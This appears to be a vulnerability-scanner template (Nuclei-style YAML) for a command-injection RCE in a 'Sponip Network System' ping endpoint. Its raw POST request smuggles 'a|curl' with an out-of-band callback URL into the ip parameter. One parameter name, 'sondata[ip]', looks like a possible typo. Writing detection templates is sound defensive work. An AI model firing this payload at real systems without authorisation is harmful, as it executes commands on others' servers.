id: sponip-network-system-ping-rce

info:
  name: Sponip Network System Ping RCE
  author: pikpikcu
  severity: critical
  reference: https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9
  tags: sponip,rce,oast,network

http:
  - raw:
      - |
        POST /php/ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sondata[ip]=a|curl {{interactsh-url}}&jsondata[type]=1

    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "http"
